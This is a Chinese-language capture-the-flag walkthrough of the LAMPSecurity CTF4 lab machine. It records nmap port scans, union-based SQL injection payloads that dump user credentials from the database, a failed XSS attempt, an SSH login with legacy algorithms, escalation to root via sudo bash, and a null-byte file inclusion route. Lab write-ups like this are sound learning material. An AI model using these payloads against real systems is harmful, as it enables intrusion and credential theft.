LAMPSECURITY:CTF4

0x01信息收集

1.信息收集

扫端口

nmap -Pn --min-rate 10000 -p- 192.168.1.30 #22,25(smtp),80
sudo nmap -sT -sV -sC -O -p22,25,80 192.168.1.30
nmap --script=vuln -p22,25,80 192.168.1.30

2.SQL注入

访问80

Blog->read more

http://192.168.1.30/index.html?page=blog&title=Blog&id=2

数字型布尔注入，order by 没用

对不起，我说话声音有点大，要加注释符

id=7 order by 5 -- -
id=-7 union select 1,2,3,4,5--+
id=-7 union select 1,database(),user(),4,5--+
#但是呢，database()报错，length(database())是回显了的

不慌，根据nmap扫出来的路径

数据库是ehks，表名为user，字段user_name 、user_pass

id=-7 union select 1,(select group_concat('!',user_name,0x7e,user_pass) from ehks.user),3,4,5--+

6个用户

3.略过不看，路线走歪了

去 /admin路径登录(也是nmap扫出来的)，第一个用户登录进来，只有发布功能，我把内容弄个xss的，发布后访问，可以弹窗，那我尝试一下，写php一句话，写个POST的

不行诶

注释了

注释了，也对，后端语言在前端，执行不了

访问conf路径

其中有一个dstevens

换路径 /mail

我们dstevens进来了

哦，这些内容都是“我”进行攻击行为的记录，更早的有其它的作者信息，里面也提到了一个/calendar路径，难道我要发邮件拿shell吗

换路径 /restricted，需要凭证

用的是pmoore用户

没有有效信息

嘶，那怎么拿shell

dirb扫一波，也扫到了邮箱里看到的 /calendar路径

访问后，登录，有一个添加事件

好像也写不了shell，算了

啊！！！！！！！！！！！！！！！！！！！那咋搞！！！！！！！

4.ssh连接+sudo提权

看了wp，还是ssh，啧，我没有继续用kali的了，用了物理机的一个ssh工具，直接连接成功

回到kali，根据ssh报错结果去百度

ssh -oHostKeyAlgorithms=+ssh-dss -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 dstevens@192.168.1.30

emmm，好像和这些问题无关

这是因为登录一些老旧设备的缘故，解决参考

之后随便一个sudo /bin/bash 或者 sudo bash -p，就拿到root了

补充

1.关于那个 database()、user()报错，其实还是要尝试回显位，比如第3个回显位是可以显示字符串的

方法二：文件包含

2.然后除了SQL注入，还有文件包含这种解法，猜测page参数可以文件包含，用 %00截断，直到获得敏感文件内容即可

其实插件暴露了php版本<5.3.4，也是存在这种%00漏洞的

总结

1. 端口22,25,80
2. 访问80端口，发现了url上的id参数，考虑SQL注入
3. 手工或mysql拿到用户数据
4. ssh尝试登录进系统
5. 低权限用户又可以sudo -l，所以直接提权

遇到报错问题，如ssh，一定要主动去搜索去解决！！！

渗透测试，工具不重要，原理才重要，工具只是讲究效率

因为对于工具来说，在实战中，工具特征码可能会被识别到

还有之前做靶机的时候，目标机它没有nmap，那怎么扫端口；还要做个内网转发

只会用脚本，那给你禁用了怎么办，会原理，就可以微改